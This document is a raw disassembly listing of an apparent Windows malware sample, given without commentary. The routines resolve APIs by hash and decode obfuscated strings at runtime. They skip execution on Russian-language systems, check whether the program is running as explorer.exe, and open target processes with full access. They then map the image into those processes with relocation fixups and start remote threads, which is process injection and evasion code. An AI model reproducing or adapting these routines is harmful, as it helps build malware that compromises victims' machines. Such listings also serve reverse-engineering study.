mov edi, 0C8AC8026h
push edi
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 0Ah
push esi
push offset dword_4031F0
call sub_40102C
push edi
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 0Ch
push esi
push offset dword_4031E0
call sub_40102C
push edi
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 30h
pop eax
push 1Dh
pop ecx
mov edi, 0BFh
loc_401C4A: ; CODE XREF: sub_401BD8+83�j
cmp ecx, edi
ja short loc_401C50
inc eax
inc ecx
loc_401C50: ; CODE XREF: sub_401BD8+74�j
add eax, 0Dh
add ecx, 0Dh
cmp eax, 94h
jl short loc_401C4A
push 7A813811h
xor ebx, ebx
push 1
mov dword_404104, eax
mov [ebp+var_28], ebx
call sub_401117
pop ecx
pop ecx
call eax
movzx eax, ax
push 32h
mov [ebp+var_24], eax
pop eax
push 0FFFFFFD3h
pop ecx
loc_401C83: ; CODE XREF: sub_401BD8+BD�j
cmp ecx, 98h
ja short loc_401C8D
inc eax
inc ecx
loc_401C8D: ; CODE XREF: sub_401BD8+B1�j
add eax, 13h
add ecx, 13h
cmp eax, edi
jl short loc_401C83
push 3
push esi
push offset dword_4031DC
mov dword_404104, eax
call sub_40102C
push 67ECDE97h
push 1
call sub_401117
add esp, 14h
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_28]
push ecx
push ebx
push ebx
push esi
call eax
push 2
push esi
push offset dword_4031D8
call sub_40102C
push [ebp+var_28]
lea eax, [ebp+var_48]
push esi
push eax
call dword_403014 ; wsprintfA
add esp, 18h
push 51h
pop eax
push 15h
pop ecx
loc_401CE9: ; CODE XREF: sub_401BD8+124�j
cmp ecx, 92h
ja short loc_401CF3
inc eax
inc ecx
loc_401CF3: ; CODE XREF: sub_401BD8+117�j
add eax, 0Dh
add ecx, 0Dh
cmp eax, 68h
jl short loc_401CE9
push 0Bh
push esi
push offset dword_4031CC
mov dword_404104, eax
call sub_40102C
mov edi, dword_403000
add esp, 0Ch
push esi
lea eax, [ebp+var_1B8]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_4031BC
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_1A8]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_4031AC
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_198]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_40319C
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_188]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_40318C
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_178]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_403180
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_168]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_403170
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_158]
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 419h
jz loc_4023E7
call sub_401094
test eax, eax
jnz loc_4023E7
call sub_401302
test al, al
jz short loc_401DE8
push ebx
call sub_401497
pop ecx
loc_401DE8: ; CODE XREF: sub_401BD8+207�j
mov [ebp+var_20], ebx
mov ebx, dword_40300C
loc_401DF1: ; CODE XREF: sub_401BD8+5A7�j
cmp [ebp+var_20], 0
jnz short loc_401E01
push 21h
push esi
push offset aSqqaBbifiimqmg ; "áïïíÈBBifiimïmgiíÂá`BíìbflBìàíclB"
jmp short loc_401E09
; ---------------------------------------------------------------------------
loc_401E01: ; CODE XREF: sub_401BD8+21D�j
push 22h
push esi
push offset aSqqaBbiftfaqoc ; "áïïíÈBBifâfíïoçeaÂäaèBíìbflBìàíclB"
loc_401E09: ; CODE XREF: sub_401BD8+227�j
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_3B8]
push eax
call edi ; lstrcpy
push 3
push esi
push offset dword_403124
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 16h
push esi
push offset aBceUsuAsajecuk ; "bçe`ãáîÂíáíJeçîKeçîNLO"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401782
add esp, 0Ch
push 2
push esi
push offset aD ; "dÈ"
call sub_40102C
add esp, 0Ch
lea eax, [ebp+var_2B8]
push esi
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 410h
jnz short loc_401F00
lea eax, [ebp+var_1A8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 5
push esi
push offset aUbssa ; "ãbéáa"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401782
add esp, 0Ch
mov [ebp+var_C], eax
jmp loc_402105
; ---------------------------------------------------------------------------
loc_401F00: ; CODE XREF: sub_401BD8+2CC�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset aCdlufsoAsa ; "çdlãäáoÂíáí"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401782
push 2
push esi
push offset aD ; "dÈ"
mov [ebp+var_C], eax
call sub_40102C
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_178]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 9
push esi
push offset aAscddAsa ; "íèæddÂíáí"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401782
add [ebp+var_C], eax
push 2
push esi
push offset aD ; "dÈ"
call sub_40102C
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset aIfsogFdAsa ; "iäéogìädÂíáí"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401782
add [ebp+var_C], eax
push 2
push esi
push offset aD ; "dÈ"
call sub_40102C
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_198]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 9
push esi
push offset aUfiaAsa ; "îäiaìÂíáí"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401782
add [ebp+var_C], eax
push 2
push esi
push offset aD ; "dÈ"
call sub_40102C
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_188]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Eh
push esi
push offset aQaFbicucfAsa ; "ïíìäbicîæfÂíáí"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401782
add esp, 0Ch
add [ebp+var_C], eax
loc_402105: ; CODE XREF: sub_401BD8+323�j
push 2
push esi
push offset aD ; "dÈ"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 7
push esi
push offset aFclaacs ; "äclííçè"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401782
add eax, [ebp+var_C]
add esp, 0Ch
test eax, eax
jg short loc_40218A
inc [ebp+var_20]
cmp [ebp+var_20], 2
jl loc_401DF1
jmp loc_4023E5
; ---------------------------------------------------------------------------
loc_40218A: ; CODE XREF: sub_401BD8+59E�j
push 3
push esi
push offset dword_403124
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
cmp dword_404104, 0D7h
jge short loc_4021D3
inc dword_404104
loc_4021D3: ; CODE XREF: sub_401BD8+5F3�j
push 1Fh
push esi
push offset aFqmFbbuAsajecu ; "ìäïmìäbbãÂíáíJeçîKeçîNLOÆdbçgMK"
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
push 9
pop eax
push 0FFFFFFAAh
pop ecx
loc_402207: ; CODE XREF: sub_401BD8+642�j
cmp ecx, 8Eh
ja short loc_402211
inc eax
inc ecx
loc_402211: ; CODE XREF: sub_401BD8+635�j
add eax, 2Fh
add ecx, 2Fh
cmp eax, 6Ah
jl short loc_402207
push 2
push esi
mov edi, offset dword_403090
push edi
mov dword_404104, eax
call sub_40102C
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_8]
add al, 1Dh
add esp, 18h
cmp byte ptr [ebp+var_8+1], 0
mov [ebp+var_13], al
jnz short loc_402256
mov [ebp+var_11], 30h
jmp short loc_40225E
; ---------------------------------------------------------------------------
loc_402256: ; CODE XREF: sub_401BD8+676�j
mov al, byte ptr [ebp+var_8+1]
add al, 13h
mov [ebp+var_11], al
loc_40225E: ; CODE XREF: sub_401BD8+67C�j
mov eax, dword_404104
add eax, 0FFFFFFF0h
cmp eax, 0C2h
ja short loc_402273
inc dword_404104
loc_402273: ; CODE XREF: sub_401BD8+693�j
push 2
push esi
push edi
call sub_40102C
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_4]
add al, 17h
add esp, 18h
cmp byte ptr [ebp+var_4+1], 0
mov [ebp+var_14], al
jnz short loc_4022A3
mov [ebp+var_12], 30h
jmp short loc_4022AB
; ---------------------------------------------------------------------------
loc_4022A3: ; CODE XREF: sub_401BD8+6C3�j
mov al, byte ptr [ebp+var_4+1]
add al, 19h
mov [ebp+var_12], al
loc_4022AB: ; CODE XREF: sub_401BD8+6C9�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_10], 0
call ebx ; lstrcat
push 7
push esi
push offset dword_403088
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
mov eax, dword_404104
add eax, 0FFFFFFADh
cmp eax, 0A5h
ja short loc_4022FF
inc dword_404104
loc_4022FF: ; CODE XREF: sub_401BD8+71F�j
push 2
push esi
push edi
call sub_40102C
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_8]
add esp, 18h
test ah, ah
mov [ebp+var_1B], al
mov [ebp+var_1A], 30h
jz short loc_40232D
mov [ebp+var_1A], ah
loc_40232D: ; CODE XREF: sub_401BD8+750�j
cmp dword_404104, 0Eh
jl short loc_40233C
inc dword_404104
loc_40233C: ; CODE XREF: sub_401BD8+75C�j
cmp dword_404104, 97h
jle short loc_402352
mov dword_404104, 17h
loc_402352: ; CODE XREF: sub_401BD8+76E�j
push 2
push esi
push edi
call sub_40102C
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_4]
add esp, 18h
test ah, ah
mov [ebp+var_19], al
mov [ebp+var_1C], 30h
jz short loc_402380
mov [ebp+var_1C], ah
loc_402380: ; CODE XREF: sub_401BD8+7A3�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_18], 0
call ebx ; lstrcat
push 4
push esi
push offset dword_403080
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401782
mov eax, dword_404104
add eax, 0FFFFFFD8h
add esp, 0Ch
cmp eax, 0CCh
ja short loc_4023E5
inc dword_404104
loc_4023E5: ; CODE XREF: sub_401BD8+5AD�j
; sub_401BD8+805�j
xor ebx, ebx
loc_4023E7: ; CODE XREF: sub_401BD8+1ED�j
; sub_401BD8+1FA�j
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_401BD8 endp
; =============== S U B R O U T I N E =======================================
sub_4023FD proc near ; DATA XREF: sub_4027DB+50�o
push esi
push edi
mov edi, 81F0F0DFh
push edi
push 1
call sub_401117
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
jmp short loc_402445
; ---------------------------------------------------------------------------
loc_402413: ; CODE XREF: sub_4023FD+4F�j
push 1297812Ch
push 1
call sub_401117
pop ecx
pop ecx
call eax
cmp eax, 2
jz short loc_40244E
push 3D9972F5h
push 1
call sub_401117
pop ecx
pop ecx
push 3E8h
call eax
push edi
push 1
call sub_401117
loc_402445: ; CODE XREF: sub_4023FD+14�j
pop ecx
pop ecx
push esi
call eax
test eax, eax
jz short loc_402413
loc_40244E: ; CODE XREF: sub_4023FD+29�j
pop edi
xor eax, eax
pop esi
retn 4
sub_4023FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402455 proc near ; CODE XREF: sub_4027DB+125�p
; sub_402950+148�p ...
var_310 = dword ptr -310h
var_260 = dword ptr -260h
var_44 = byte ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 310h
push ebx
push esi
push edi
call sub_401113
and eax, 0FFFF0000h
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword_404104, 0Ah
mov [ebp+var_14], eax
lea eax, [ecx+18h]
mov esi, [eax+38h]
mov [ebp+var_24], ecx
mov [ebp+var_1C], eax
mov [ebp+var_18], esi
jl short loc_402491
inc dword_404104
loc_402491: ; CODE XREF: sub_402455+34�j
cmp dword_404104, 0B5h
jle short loc_4024A7
mov dword_404104, 25h
loc_4024A7: ; CODE XREF: sub_402455+46�j
push 0A08B638Ch
xor ebx, ebx
push 1
mov [ebp+var_1], bl
call sub_401117
pop ecx
pop ecx
push 9
call eax
mov edi, eax
neg edi
sbb edi, edi
and edi, 3Ch
add edi, 4
cmp dword_404104, 0Fh
jl short loc_4024D9
inc dword_404104
loc_4024D9: ; CODE XREF: sub_402455+7C�j
cmp dword_404104, 0F7h
jle short loc_4024EF
mov dword_404104, 20h
loc_4024EF: ; CODE XREF: sub_402455+8E�j
push 0EF0A25B7h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push esi
push ebx
push edi
push ebx
push 0FFFFFFFFh
call eax
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_402514
xor al, al
jmp loc_4027D6
; ---------------------------------------------------------------------------
loc_402514: ; CODE XREF: sub_402455+B6�j
push 5CD9430h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push 2
push [ebp+var_C]
call eax
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_40279E
push 19h
pop eax
push 0FFFFFFCFh
pop ecx
loc_40253D: ; CODE XREF: sub_402455+FD�j
cmp ecx, 86h
ja short loc_402547
inc eax
inc ecx
loc_402547: ; CODE XREF: sub_402455+EE�j
add eax, 30h
add ecx, 30h
cmp eax, 8Ah
jl short loc_40253D
push 12h
mov esi, offset dword_404108
push esi
push offset dword_40321C
mov dword_404104, eax
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_44]
push eax
call dword_403000 ; lstrcpy
push 9
push esi
push offset dword_403210
call sub_40102C
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 1FC0EAEEh
push 1
mov esi, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_44]
push ecx
push esi
call eax
cmp dword_404104, 4Dh
mov [ebp+var_10], ebx
jge short loc_4025C1
inc dword_404104
loc_4025C1: ; CODE XREF: sub_402455+164�j
mov esi, [ebp+var_18]
push edi
push ebx
push 1
lea ecx, [ebp+var_20]
push ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_10]
push ecx
push [ebp+arg_4]
mov [ebp+var_20], esi
push [ebp+var_C]
call eax
mov edi, [ebp+var_14]
push esi
push edi
push [ebp+var_8]
call sub_4010EE
add esp, 0Ch
cmp dword_404104, 77h
jge short loc_4025FD
inc dword_404104
loc_4025FD: ; CODE XREF: sub_402455+1A0�j
mov eax, [ebp+var_24]
movzx ecx, word ptr [eax+14h]
mov esi, [ebp+var_10]
add ecx, [ebp+var_1C]
push 3
pop eax
push 0FFFFFFE4h
sub esi, edi
pop edx
loc_402612: ; CODE XREF: sub_402455+1D2�j
cmp edx, 0D7h
ja short loc_40261C
inc eax
inc edx
loc_40261C: ; CODE XREF: sub_402455+1C3�j
add eax, 16h
add edx, 16h
cmp eax, 0A8h
jl short loc_402612
mov dword_404104, eax
mov eax, [ecx+34h]
add eax, edi
loc_402633: ; CODE XREF: sub_402455+1EF�j
cmp word ptr [eax], 0BE8Dh
jnz short loc_402643
cmp dword ptr [eax+6], 0C009078Bh
jz short loc_402646
loc_402643: ; CODE XREF: sub_402455+1E3�j
inc eax
jmp short loc_402633
; ---------------------------------------------------------------------------
loc_402646: ; CODE XREF: sub_402455+1EC�j
mov eax, [eax+2]
add eax, [ecx+0Ch]
add eax, edi
jmp short loc_40265D
; ---------------------------------------------------------------------------
loc_402650: ; CODE XREF: sub_402455+20A�j
add eax, 8
jmp short loc_402656
; ---------------------------------------------------------------------------
loc_402655: ; CODE XREF: sub_402455+204�j
inc eax
loc_402656: ; CODE XREF: sub_402455+1FE�j
cmp [eax], bx
jnz short loc_402655
inc eax
inc eax
loc_40265D: ; CODE XREF: sub_402455+1F9�j
cmp [eax], ebx
jnz short loc_402650
push 16h
pop edi
push 0Fh
pop edx
loc_402667: ; CODE XREF: sub_402455+228�j
cmp edx, 0DCh
ja short loc_402671
inc edi
inc edx
loc_402671: ; CODE XREF: sub_402455+218�j
add edi, 17h
add edx, 17h
cmp edi, 88h
jl short loc_402667
mov edx, [ebp+var_8]
mov dword_404104, edi
mov ecx, [ecx+0Ch]
add eax, 4
lea edx, [ecx+edx-4]
mov cl, [eax]
inc eax
cmp cl, bl
jz short loc_4026C3
loc_402699: ; CODE XREF: sub_402455+266�j
cmp cl, 0F0h
jnb short loc_4026A5
movzx ecx, cl
add edx, ecx
jmp short loc_4026B4
; ---------------------------------------------------------------------------
loc_4026A5: ; CODE XREF: sub_402455+247�j
movzx edi, word ptr [eax]
and ecx, 0Fh
shl ecx, 10h
or ecx, edi
add edx, ecx
inc eax
inc eax
loc_4026B4: ; CODE XREF: sub_402455+24E�j
add [edx], esi
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_402699
mov edi, dword_404104
loc_4026C3: ; CODE XREF: sub_402455+242�j
cmp edi, 0DFh
jge short loc_4026D2
inc edi
mov dword_404104, edi
loc_4026D2: ; CODE XREF: sub_402455+274�j
mov edi, [ebp+var_10]
sub edi, [ebp+var_14]
add edi, [ebp+arg_0]
cmp [ebp+arg_8], ebx
jnz short loc_402734
push 0E61874B3h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push edi
push ebx
push ebx
push [ebp+arg_4]
call eax
push 723EB0D5h
push 1
mov edi, eax
call sub_401117
pop ecx
pop ecx
push edi
call eax
push 6
pop eax
push 0FFFFFFC0h
mov [ebp+var_1], 1
pop ecx
loc_402716: ; CODE XREF: sub_402455+2D6�j
cmp ecx, 94h
ja short loc_402720
inc eax
inc ecx
loc_402720: ; CODE XREF: sub_402455+2C7�j
add eax, 2Bh
add ecx, 2Bh
cmp eax, 99h
jl short loc_402716
mov dword_404104, eax
jmp short loc_40278B
; ---------------------------------------------------------------------------
loc_402734: ; CODE XREF: sub_402455+289�j
push 0AA1DE02Fh
push 1
mov [ebp+var_310], 10002h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 0AA1DC82Fh
push 1
mov [ebp+var_260], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
cmp dword_404104, 38h
mov [ebp+var_1], 1
jge short loc_40278B
inc dword_404104
loc_40278B: ; CODE XREF: sub_402455+2DD�j
; sub_402455+32E�j
push 77CD9567h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_40279E: ; CODE XREF: sub_402455+DC�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
push 4
pop eax
push 0FFFFFFE5h
pop ecx
loc_4027B7: ; CODE XREF: sub_402455+377�j
cmp ecx, 0AFh
ja short loc_4027C1
inc eax
inc ecx
loc_4027C1: ; CODE XREF: sub_402455+368�j
add eax, 25h
add ecx, 25h
cmp eax, 0B8h
jl short loc_4027B7
mov dword_404104, eax
mov al, [ebp+var_1]
loc_4027D6: ; CODE XREF: sub_402455+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_402455 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027DB proc near ; DATA XREF: sub_402950+143�o
; sub_402950+31D�o
var_14C = byte ptr -14Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14Ch
push ebx
push edi
xor ebx, ebx
push 3D9972F5h
inc ebx
push ebx
call sub_401117
pop ecx
pop ecx
push 7D0h
call eax
mov eax, dword_404104
add eax, 0FFFFFFFAh
cmp eax, 0D2h
ja short loc_402812
inc dword_404104
loc_402812: ; CODE XREF: sub_4027DB+2F�j
push esi
push 6FB89AF0h
xor edi, edi
push ebx
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push edi
push edi
push offset sub_4023FD
push edi
push edi
call eax
push 723EB0D5h
push ebx
mov esi, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
push 49A1374Ah
push ebx
call sub_401117
pop ecx
pop ecx
push 104h
lea ecx, [ebp+var_14C]
push ecx
call eax
push 0Ch
mov esi, offset dword_404108
push esi
push offset dword_403230
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_14C]
push eax
call dword_40300C ; lstrcat
cmp dword_404104, 0B5h
jge short loc_402896
inc dword_404104
loc_402896: ; CODE XREF: sub_4027DB+B3�j
push 40h
lea eax, [ebp+var_44]
push edi
push eax
mov [ebp+var_48], 44h
call sub_4010BB
mov eax, dword_404104
add eax, 0FFFFFFA7h
add esp, 0Ch
cmp eax, 7Bh
mov [ebp+var_1C], ebx
mov [ebp+var_18], 5
ja short loc_4028C8
inc dword_404104
loc_4028C8: ; CODE XREF: sub_4027DB+E5�j
push 46318AC7h
push ebx
call sub_401117
pop ecx
pop ecx
push offset dword_40420C
lea ecx, [ebp+var_48]
push ecx
push edi
push edi
push 4
push edi
push edi
push edi
lea ecx, [ebp+var_14C]
push ecx
push edi
call eax
push dword_404210
push dword_40420C
push offset sub_401BD8
call sub_402455
add esp, 0Ch
test al, al
jz short loc_402922
mov esi, dword_404210
push 7B88BF3Bh
push ebx
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_402922: ; CODE XREF: sub_4027DB+12F�j
mov eax, dword_404104
add eax, 0FFFFFFCFh
cmp eax, 0A6h
pop esi
ja short loc_402938
inc dword_404104
loc_402938: ; CODE XREF: sub_4027DB+155�j
push 768AA260h
push ebx
call sub_401117
pop ecx
pop ecx
push edi
call eax
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_4027DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402950 proc near ; CODE XREF: start+1BC�j
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_38 = byte ptr -38h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
lea ebx, [ebp+var_13C]
call sub_401302
test al, al
jz loc_402CAB
cmp dword_404104, 5
jl short loc_40297E
inc dword_404104
loc_40297E: ; CODE XREF: sub_402950+26�j
cmp dword_404104, 9Dh
jle short loc_402994
mov dword_404104, 16h
loc_402994: ; CODE XREF: sub_402950+38�j
mov edi, 774393E8h
push edi
push 1
call sub_401117
pop ecx
pop ecx
mov esi, 104h
push esi
lea ecx, [ebp+var_13C]
push ecx
push 0
call eax
xor ecx, ecx
test eax, eax
jz short loc_4029CE
loc_4029BA: ; CODE XREF: sub_402950+7C�j
lea edx, [ebp+ecx+var_13B]
cmp byte ptr [edx-1], 5Ch
jnz short loc_4029C9
mov ebx, edx
loc_4029C9: ; CODE XREF: sub_402950+75�j
inc ecx
cmp ecx, eax
jnz short loc_4029BA
loc_4029CE: ; CODE XREF: sub_402950+68�j
mov ecx, [ebx]
mov eax, 20202020h
or ecx, eax
cmp ecx, 6C707865h
jnz loc_402AD7
mov ecx, [ebx+4]
or ecx, eax
cmp ecx, 7265726Fh
jnz loc_402AD7
mov ecx, [ebx+8]
or ecx, eax
cmp ecx, 6578652Eh
jnz loc_402AD7
mov eax, [ebp+arg_4]
dec eax
jnz loc_402AD0
push 8
pop ecx
push 0Ch
mov esi, offset dword_404108
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_403240
rep stosd
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_401497
mov esi, eax
test esi, esi
pop ecx
jz loc_402AD0
cmp dword_404104, 1
jl short loc_402A5C
inc dword_404104
loc_402A5C: ; CODE XREF: sub_402950+104�j
cmp dword_404104, 0CBh
jle short loc_402A72
mov dword_404104, 16h
loc_402A72: ; CODE XREF: sub_402950+116�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push 0
push 1F0FFFh
call eax
mov esi, eax
test esi, esi
jz short loc_402AD0
push 0
push esi
push offset sub_4027DB
call sub_402455
add esp, 0Ch
push 5
pop eax
push 0FFFFFFA6h
pop ecx
loc_402AA6: ; CODE XREF: sub_402950+168�j
cmp ecx, 71h
ja short loc_402AAD
inc eax
inc ecx
loc_402AAD: ; CODE XREF: sub_402950+159�j
add eax, 0Bh
add ecx, 0Bh
cmp eax, 93h
jl short loc_402AA6
push 723EB0D5h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_402AD0: ; CODE XREF: sub_402950+B9�j
; sub_402950+F7�j ...
xor eax, eax
jmp loc_402CE9
; ---------------------------------------------------------------------------
loc_402AD7: ; CODE XREF: sub_402950+8D�j
; sub_402950+9E�j ...
xor ebx, ebx
push edi
inc ebx
push ebx
call sub_401117
pop ecx
pop ecx
push esi
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call eax
push 0D89AD05h
push ebx
call sub_401117
pop ecx
pop ecx
call eax
mov esi, eax
mov eax, dword_404104
add eax, 0FFFFFFE4h
